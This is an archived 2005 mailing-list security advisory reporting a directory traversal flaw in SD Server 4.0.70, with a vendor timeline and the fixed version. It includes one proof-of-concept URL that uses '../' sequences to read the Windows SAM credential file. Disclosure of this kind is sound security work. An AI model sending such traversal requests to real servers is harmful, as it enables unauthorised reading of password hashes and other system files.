| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <00d001c5184d$63772bf0$0100a8c0@server>
Date: Mon, 21 Feb 2005 20:41:49 +0100
From: "CorryL" <corryl@...overde.com>
To: <full-disclosure@...ts.netsys.com>
Cc: bugtraq@...urityfocus.com
Subject: SD Server 4.0.70 Directory Traversal Bug
..:x0n3-h4ck Italian Security Team:..
/*Advisories*\
*/
Application: SD Server
Url Vendor: http://www.gdsoftware.dk/
Version: <= 4.0.70
Platforms: Windows
Bug: Directory Traversal
Exploitation: Remote
Author: CorryL
Email Author: corryl80@...il.com
Url Author: www.x0n3-h4ck.org
*\
{Description}
The SD Server is a easy http server, A remote user can obtain files on the
system that are located outside of
the web document directory.
{Bug}
http://victimhost/../../../windows/repair/sam
A remote user succeeds to read the file sam of the system where to be in
execution SD Server.
{Vendor Status}
20/02/2005 Vendor notification
20/02/2005 Vendor response
21/02/2005 Vendor Fix the Bug
{Fix}
In version 4.0.0.72
http://www.gdsoftware.dk/dl_file.asp?link=SDServer 4.0.0.72.zip
CorryL
corryl80@...il.com
www.x0n3-h4ck.org
Italian Security Team
_________________________________
www.seekstat.it is your web stat
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists